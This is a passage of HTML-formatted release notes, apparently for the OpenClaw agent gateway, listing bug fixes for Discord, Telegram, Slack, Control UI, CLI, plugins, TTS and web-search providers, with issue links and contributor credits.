<li>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</li>
<li>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</li>
<li>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</li>
<li>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</li>
<li>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</li>
<li>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</li>
<li>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</li>
<li>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</li>
<li>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</li>
<li>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</li>
<li>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</li>
<li>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</li>
<li>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</li>
<li>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</li>
<li>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</li>
<li>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</li>
<li>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</li>
<li>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</li>
<li>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</li>
<li>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</li>
<li>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks @rixcorp-oc.</li>
<li>Slack/DMs/routing: honor <code>dmHistoryLimit</code> for fresh 1:1 DMs, keep top-level DMs on stable DM sessions even when <code>replyToMode</code> targets thread replies, send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code>, match Slack target route syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, and match public-channel allowlists against bare runtime channel IDs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @brantley-creator, @daye-jjeong, @MarkMolina, @Winnsolutionsadmin, @babutree, and @Realworld404.</li>
<li>Slack/delivery/capabilities: preserve missing-scope details in outbound errors, read granted scopes from <code>auth.test</code> metadata before legacy APIs, retry Slack writes only for wrapped DNS request failures such as <code>EAI_AGAIN</code>, and prefer the account bound to the outbound target peer in multi-workspace sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @alexey-pelykh, @Qquanwei, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>, @sonnyb9, and @rijhsinghani.</li>
<li>Slack/message actions/tools: send media before follow-up Block Kit messages for file sends, forward agent-scoped media roots through the bundled upload-file path, resolve <code>&lt;!subteam^...&gt;</code> user-group mentions before waking mention-gated channels, and let <code>read</code> fetch an exact Slack message timestamp or thread reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @HirokiKobayashi-R, @benpchandler, @CG-Intelligence-Agent-Jack, and @zomars.</li>
<li>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</li>
<li>Web search/Gemini/DuckDuckGo/Brave/fetch: route abort signals into Gemini provider fetches, late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, reuse Google provider API key/base URL as lower-priority Gemini search fallbacks, pass Gemini freshness/date filters through grounding, include DuckDuckGo in setup, honor Gemini/Grok/x_search <code>baseUrl</code> overrides, point Brave metadata at canonical docs, support Brave LLM Context freshness/date ranges, resolve external <code>webFetchProviders</code> for non-sandboxed fetches, and point missing-key errors to <code>web_fetch</code> or browser where appropriate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" 